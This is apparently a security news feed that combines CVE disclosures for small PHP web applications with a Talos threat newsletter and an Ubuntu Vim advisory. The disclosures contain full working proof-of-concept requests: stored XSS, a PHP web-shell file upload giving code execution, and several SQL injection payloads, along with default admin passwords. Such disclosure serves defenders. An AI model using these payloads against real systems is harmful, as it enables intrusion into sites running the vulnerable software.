A vulnerability was found in SourceCodester Product Show Room Site 1.0. It has been declared as problematic. This vulnerability affects p=contact. The manipulation of the Message textbox with the input <script>alert(1)</script> leads to cross site scripting. The attack can be initiated remotely but requires authentication. Exploit details have been disclosed to the public.

**Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)****Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code****Version: Product Show Room Site 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.

**Payload used:**

<script>alert(111)</script>

**Proof of Concept**

1.  Login the CMS. Default Admin Access Username: admin Password: admin123
    
2.  Open Page http://172.24.5.107/psrs/?p=contact
    
3.  Put XSS payload (<script>alert(111)</script>) in the Message box and click on Send Message to publish the page  
    
4.  Open http://172.24.5.107/psrs/admin/?page=inquiries,Viewing the Top 1 of Inquiries page,We can see the alert.

CVE-2022-1979: webray.com.cn/'Message' Stored Cross-Site Scripting(XSS).md at main · Xor-Gerke/webray.com.cn

Car Rental Management System v1.0 is vulnerable to Arbitrary code execution via car-rental-management-system/admin/ajax.php?action=save_car.

Permalink

Cannot retrieve contributors at this time

**Car Rental Management System v1.0 has arbitrary code execution (RCE)**

vendor: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability url: ip/car-rental-management-system/admin/ajax.php?action=save\_car

Request package for file upload：

POST /car\-rental\-management\-system/admin/ajax.php?action\=save\_car HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/car-rental-management-system/admin/index.php?page=manage\_car&id=6
Content-Length: 1107
Content-Type: multipart/form-data; boundary=---------------------------16501296121152
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close
\-----------------------------16501296121152
Content-Disposition: form-data; name="id"
6
\-----------------------------16501296121152
Content-Disposition: form-data; name="brand"
1
\-----------------------------16501296121152
Content-Disposition: form-data; name="model"
1
\-----------------------------16501296121152
Content-Disposition: form-data; name="category\_id"
6
\-----------------------------16501296121152
Content-Disposition: form-data; name="engine\_id"
3
\-----------------------------16501296121152
Content-Disposition: form-data; name="transmission\_id"
3
\-----------------------------16501296121152
Content-Disposition: form-data; name="description"
111
\-----------------------------16501296121152
Content-Disposition: form-data; name="price"
10
\-----------------------------16501296121152
Content-Disposition: form-data; name="qty"
110
\-----------------------------16501296121152
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/pdf
JFJF
<?php phpinfo();?>
\-----------------------------16501296121152--

The files will be uploaded to this directory \\admin\\assets\\uploads\\cars\_img  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-32019: bug_report/RCE-1.md at main · k0xx11/bug_report

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
Many of you readers may be gearing up for a West Coast swing over the next few weeks through San Francisco and Las Vegas for RSA and Cisco Live, respectively. And we’re right behind you!  
Talos...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

Many of you readers may be gearing up for a West Coast swing over the next few weeks through San Francisco and Las Vegas for RSA and Cisco Live, respectively. And we’re right behind you!  

Talos will have plenty of representation at both conferences, including giving lightning talks at the Cisco Secure booth, several features talks and spots, live podcast recordings, and more. To get you ready for RSA, I wanted to highlight a few special things we’re doing at the conference you should know about before you go.  

As always, you can keep posted on our latest plans and talk schedule by following us on Twitter. 

**Main booth** 

Stop by the main Talos and Cisco Secure booth at Moscone North Hall to say hi, ask questions and get the latest information on what we’re up to. 

At the booth, we’ll be premiering a new video series and giving out some of our newest stickers created in the image of our favorite malware “mascots.” Everyone will be jealous if you have one of these on your laptop. 

**Evolving Your Defense: Making Heads or Tails of Threat Actor Trends** 

Nick Biasini and Pierre Cadieux are hosting our sponsored session on June 7 at 9:40 a.m. PT. In this talk, they’ll be breaking down the latest threat actor tactics, techniques and procedures and telling you which ones you should be worried about and what can be ignored. 

**Beers with Talos/Security Stories** 

We’re hosting two live podcasts back-to-back at the Marriott Marquis: Sierra C ballroom from 2 – 5 p.m. PT on June 7. Security Stories and Beers with Talos are getting together to play a game of “Would I lie to you?”  

Talos’ vice president, Matt Watchinski, will be on hand for both episodes, along with other special guests.  

The Beers with Talos episode will cover Talos’ work in Ukraine, and we’ll hear from the audience about their hottest security takes.  

**The one big thing **

A recently discovered zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. CVE-2022-30190, also known under the name "Follina," exists when MSDT is called using the URL protocol from an application, such as Microsoft Office, Microsoft Word or via an RTF file. An attacker could exploit this vulnerability to gain the ability to run arbitrary code on the targeted system. 

  

> **Why do I care? **
> 
> If an attacker were to successfully exploit this vulnerability, they could execute remote code on the targeted machine. Needless to say, that’s bad. This is just the latest in a string of Microsoft vulnerabilities to make headlines over the past 12 months, including PrintNightmare and multiple Exchange Server issues. If those cases have taught us anything, it’s that attackers aren’t afraid to look for vulnerable Microsoft products to try and gain a foothold on a targeted network or machine.  
> 
> **So now what? **Although a patch hasn't been released yet, Microsoft has provided workarounds and Windows Defender protections for the CVE and malware exploiting this vulnerability. Cisco Talos has also released coverage to protect against this vulnerability, including multiple Snort rules and a ClamAV signature.   

**Other news of note**

Costa Rica’s government was hit with another ransomware attack, this time from the Hive group. Hive took down the country’s health department’s online services earlier this week, adding to the problems Costa Rica is facing after Conti launched a ransomware attack in May. Security experts say there is evidence that Conti and Hive may be working together to extort the Costa Rican government. This is all going on as the Conti group claims it’s shutting down and splitting up into smaller groups. The Hive operators have not yet declared a ransom amount. (Bleeping Computer, Krebs on Security, CSO Online) 

The U.S. Department of Justice seized three domains associated with selling and collecting stolen and leaked personal information. Authorities said the sites, WeLeakInfo, IPStress and OVH Booster all assisted attackers in carrying out denial-of-service attacks. In 2020, the DoJ seized very similar domains, including “weleakinfo.com,” which at the time, offered users the ability to “review and obtain the personal information illegally obtained in over 10,000 data breaches.” (Recorded Future, Department of Justice) 

The FBI recently thwarted an attempted cyber attack on a Boston children’s hospital, according to the agency’s director. Chris Wray, speaking at an event in Boston, received intelligence last summer ahead of time that allowed the agency to stop what he called “one of the most despicable cyberattacks I've seen.” Wray added that the attack came from an Iranian state-sponsored actor. The same hospital faced similar attacks in 2014 and 2019, he said. (ABC News, NBC 10 Boston) 

**Can’t get enough Talos? **

*   Researcher Spotlight: Martin Lee, EMEAR lead, Talos Strategic Communications
*   Threat Roundup for May 20 - 27
*   Talos Takes Ep. #98: Maybe don't panic about that F5 BIG-IP vulnerability

  

**Upcoming events where you can find Talos ****REcon (June 3 – 5, 2022)  
Montreal, Canada ****RSA 2022 (June 6 – 9, 2022)  
San Francisco, California ****Cisco Live U.S. (June 12 – 16, 2022)  
Las Vegas, Nevada ****Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  **MD5:** 93fefc3e88ffb78abb36365fa5cf857c  **Typical Filename:** Wextract    
**Claimed Product:** Internet Explorer    
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

**SHA 256:** 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645    **MD5:** 2c8ea737a232fd03ab80db672d50a17a    **Typical Filename:** LwssPlayer.scr      
**Claimed Product:** 梦想之巅幻灯播放器      
**Detection Name:** Auto.125E12.241442.in02    

**SHA 256:** 4b34e3637fa7af93ab628ae5adad2c7f3464053316963297844324a4f649a206   
**MD5:** 3632f27604f5a82cf73b9ade710a1656  **Typical Filename:** mediaget\_installer\_467.exe    
**Claimed Product:** N/A    
**Detection Name:** FileRepPup:MediaGet-tpd  

**SHA 256:** a9f7d7525aad1c7007ae9d1d3fc531a1065b28225c5b7efb7347aaf77d9aba92    
**MD5:** 8f90e544a48d75f42f9d44811320689c   **Typical Filename:** tata communications wholesale retai lpak ncl ethopia napal spice srilanka bd cli bangladesh.wsf    
**Claimed Product:** N/A     
**Detection Name:** Xml.Dropper.Valyria::100.sbx.vioc  

**SHA 256:** 85B936960FBE5100C170B777E1647CE9F0F01E3AB9742DFC23F37CB0825B30B5   **MD5:** 8c80dd97c37525927c1e549cb59bcbf3   **Typical Filename:** Eternalblue-2.2.0.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Exploit.Shadowbrokers::5A5226262.auto.talos

Threat Source newsletter (June 2, 2022) — An RSA Conference primer

Ubuntu Security Notice 5458-1 - It was discovered that Vim was incorrectly handling virtual column position operations, which could result in an out-of-bounds read. An attacker could possibly use this issue to expose sensitive information. It was discovered that Vim was not properly performing bounds checks when updating windows present on a screen, which could result in a heap buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5458-1June 02, 2022vim vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Several security issues were fixed in Vim.Software Description:- vim: Vi IMproved - enhanced vi editorDetails:It was discovered that Vim was incorrectly handling virtual columnposition operations, which could result in an out-of-bounds read. Anattacker could possibly use this issue to expose sensitiveinformation. (CVE-2021-4193)It was discovered that Vim was not properly performing bounds checkswhen updating windows present on a screen, which could result in aheap buffer overflow. An attacker could possibly use this issue tocause a denial of service or execute arbitrary code. (CVE-2022-0213)It was discovered that Vim was incorrectly handling windowexchanging operations when in Visual mode, which could result in anout-of-bounds read. An attacker could possibly use this issue toexpose sensitive information. (CVE-2022-0319)It was discovered that Vim was incorrectly handling recursion whenparsing conditional expressions. An attacker could possibly use thisissue to cause a denial of service or execute arbitrary code.(CVE-2022-0351)It was discovered that Vim was not properly handling memoryallocation when processing data in Ex mode, which could result in aheap buffer overflow. An attacker could possibly use this issue tocause a denial of service or execute arbitrary code.(CVE-2022-0359)It was discovered that Vim was not properly performing bounds checkswhen executing line operations in Visual mode, which could result ina heap buffer overflow. An attacker could possibly use this issue tocause a denial of service or execute arbitrary code.(CVE-2022-0361, CVE-2022-0368)It was discovered that Vim was not properly handling loop conditionswhen looking for spell suggestions, which could result in a stackbuffer overflow. An attacker could possibly use this issue to causea denial of service or execute arbitrary code. (CVE-2022-0408)It was discovered that Vim was incorrectly handling memory accesswhen executing buffer operations, which could result in the usage offreed memory. An attacker could possibly use this issue to executearbitrary code. (CVE-2022-0443)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   vim                             2:7.4.1689-3ubuntu1.5+esm5In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5458-1   CVE-2021-4193, CVE-2022-0213, CVE-2022-0319, CVE-2022-0351,   CVE-2022-0359, CVE-2022-0361, CVE-2022-0368, CVE-2022-0408,   CVE-2022-0443

Ubuntu Security Notice USN-5458-1

Badminton Center Management System v1.0 is vulnerable to SQL Injection via /bcms/admin/?page=sales/view_details&id.

**Badminton Center Management System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15318/badminton-center-management-system-phpoop-free-source-code.html

Current database name: bcms\_db,length is 7

Vulnerability File: /bcms/admin/?page=sales/view\_details&id=

Vulnerability location: /bcms/admin/?page=sales/view\_details&id=, id

\[+\] Payload: /bcms/admin/?page=sales/view\_details&id=6%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /bcms/admin/?page\=sales/view\_details&id\=6%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

When length (database ()) = 6, Content-Length: 28921 

When length (database ()) = 7, Content-Length: 29893

CVE-2022-31994: bug_report/SQLi-9.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/company/index.php?view=edit&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/company/index.php?view=edit&id=

Vulnerability location: /eris/admin/company/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/company/index.php?view=edit&id=-3%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /eris/admin/company/index.php?view\=edit&id\=\-3%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32007: bug_report/SQLi-2.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via eris/admin/vacancy/index.php?view=edit&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/vacancy/index.php?view=edit&id=

Vulnerability location: /eris/admin/vacancy/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/vacancy/index.php?view=edit&id=-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /eris/admin/vacancy/index.php?view\=edit&id\=\-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32008: bug_report/SQLi-3.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/applicants/index.php?view=view&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/applicants/index.php?view=view&id=

Vulnerability location: /eris/admin/applicants/index.php?view=view&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/applicants/index.php?view=view&id=-2%27%20union%20select%201,2,3,4,5,6,database(),8,9,10,11--+ // Leak place ---> id

GET /eris/admin/applicants/index.php?view\=view&id\=\-2%27%20union%20select%201,2,3,4,5,6,database(),8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32011: bug_report/SQLi-5.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/user/index.php?view=edit&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/user/index.php?view=edit&id=

Vulnerability location: /eris/admin/user/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/user/index.php?view=edit&id=-00018%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /eris/admin/user/index.php?view\=edit&id\=\-00018%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32010: bug_report/SQLi-7.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via eris/admin/category/index.php?view=edit&id=.

Permalink

Cannot retrieve contributors at this time

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/category/index.php?view=edit&id=

Vulnerability location: /eris/admin/category/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/category/index.php?view=edit&id=-24%27%20union%20select%201,database()--+ // Leak place ---> id

GET /eris/admin/category/index.php?view\=edit&id\=\-24%27%20union%20select%201,database()\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

Tag

#windows